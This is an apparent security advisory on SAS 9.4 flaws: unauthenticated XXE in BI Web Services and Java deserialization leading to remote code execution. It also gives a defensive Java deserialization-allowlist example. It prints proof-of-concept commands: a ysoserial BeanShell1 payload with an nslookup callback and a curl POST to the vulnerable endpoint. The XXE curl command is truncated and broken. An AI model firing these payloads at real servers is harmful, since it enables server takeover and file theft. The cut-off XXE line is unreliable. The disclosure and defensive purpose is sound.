Bridging the Security Gap
Multiple web services on the SAS application are vulnerable to Java deserialization attacks, and SAS BI Web Services 9.4 is vulnerable to unauthenticated XML External Entity attacks
Unauthenticated XML External Entities in SAS BI Web Services 9.4
The REST endpoint /SASBIWS/rest/services is vulnerable to XML External Entity (XXE) attacks. The REST services use an XML parser to process the request. This parser is configured so that it interprets Document Type Definitions and allows external (parameter) entities. The endpoint can therefore be used to read content from external sources, including local files on the server running the REST services and/or files from other servers in the local network.
curl -i -s -k --data-binary ' %y; ]>
Information and fix: http://support.sas.com/kb/62/987.html
Unauthenticated Java deserialization in SAS Web Infra Platform and Search Interface to SAS Content
Multiple web services on the SAS application are vulnerable to Java deserialization attacks. The SAS application contains web services, some of which expect serialized Java objects as input. These endpoints do not validate whether the input comes from a trusted source. These web services can therefore be used to deserialize arbitrary Java objects, which can lead to remote code execution and complete takeover of the server.
java -jar ysoserial.jar BeanShell1 "nslookup rcetest.[target].com"
curl -i -s -k --data-binary sas_beanshell.txt -X $'POST' https://[target]/SASWIPClientAccess/remote/ServiceRegistry -H "Content-type: application/java"
Information and fix: https://support.sas.com/kb/63/391.html
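The control missing from the endpoints described above is a restriction on which classes may be deserialized at all. The following Java example is added here for illustration and is not SAS code or the vendor's fix: it compares an unfiltered `readObject()` with one guarded by a JDK `ObjectInputFilter` allowlist. It assumes Java 9 or later; `ServiceQuery` is a hypothetical request type and both inputs are constructed inside the program.

```java
import java.io.*;
import java.util.ArrayList;
import java.util.HashMap;

public class DeserializationFilterDemo {
    // Hypothetical type that the endpoint legitimately expects (assumption).
    static class ServiceQuery implements Serializable {
        private static final long serialVersionUID = 1L;
        final String name;
        ServiceQuery(String name) { this.name = name; }
    }

    // Allowlist: the expected type and String, resource limits, reject the rest.
    static final ObjectInputFilter FILTER = ObjectInputFilter.Config.createFilter(
            ServiceQuery.class.getName()
            + ";java.lang.String;maxdepth=5;maxrefs=50;maxbytes=4096;!*");

    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream buf = new ByteArrayOutputStream();
        try (ObjectOutputStream out = new ObjectOutputStream(buf)) { out.writeObject(o); }
        return buf.toByteArray();
    }

    // The behaviour the advisory describes: any class in the stream is instantiated.
    static Object readUnfiltered(byte[] body) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
            return in.readObject();
        }
    }

    // Hardened variant: the filter must be set before the first readObject() call.
    static Object readFiltered(byte[] body) throws IOException, ClassNotFoundException {
        try (ObjectInputStream in = new ObjectInputStream(new ByteArrayInputStream(body))) {
            in.setObjectInputFilter(FILTER);
            return in.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        byte[] expected = serialize(new ServiceQuery("registry"));    // constructed input
        HashMap<String, Object> other = new HashMap<>();
        other.put("k", new ArrayList<String>());
        byte[] unexpected = serialize(other);                         // constructed input

        System.out.println("unfiltered: " + readUnfiltered(unexpected).getClass().getName());
        System.out.println("filtered:   " + ((ServiceQuery) readFiltered(expected)).name);
        try {
            readFiltered(unexpected);
            System.out.println("filtered:   unexpected type accepted, filter misconfigured");
        } catch (InvalidClassException e) {
            System.out.println("filtered:   rejected, " + e.getMessage());
        }
    }
}
```

An allowlist is used rather than a blocklist because gadget chains such as the BeanShell1 payload above are built from library classes already on the server's classpath. The filter complements, and does not replace, authenticating the endpoint and applying the vendor fix.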
A third reflected Cross-Site Scripting in SAS Logon Manager 9.4